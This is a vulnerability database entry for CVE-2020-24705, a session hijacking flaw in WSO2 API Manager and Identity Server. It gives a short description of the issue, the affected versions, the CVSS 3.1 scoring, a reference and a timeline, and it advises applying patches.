Session Hijacking Vulnerability in WSO2 API Manager and Identity Server
CVE-2020-24705

8.8HIGH

Key Information:

Vendor: Wso2
Status: Identity Server Analytics; Identity Server As Key Manager; Identity Server; Api Manager
Vendor: CVE Published:; 27 August 2020

What is CVE-2020-24705?

A security issue has been identified in various WSO2 products that allows an attacker to hijack a legitimate user session. If a legitimate user submits a specially crafted 'Try It' request, their Carbon Management Console session cookie may inadvertently be sent to a server controlled by the attacker. This vulnerability primarily affects WSO2 API Manager (up to version 3.1.0), WSO2 API Manager Analytics (up to version 2.5.0), and various versions of WSO2 Identity Server and IoT Server. Users are advised to review security advisories and apply available patches.

References

https://security.docs.wso2.com/en/latest/security-announc...

CVSS V3.1

Score:

8.8

Severity:

HIGH

Confidentiality:

High

Integrity:

High

Availability:

High

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

None

User Interaction:

Required

Scope:

Unchanged

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Aug 27, 2020
Vulnerability Reserved
Aug 27, 2020

Wso2

What is CVE-2020-24705?

References

CVSS V3.1

Timeline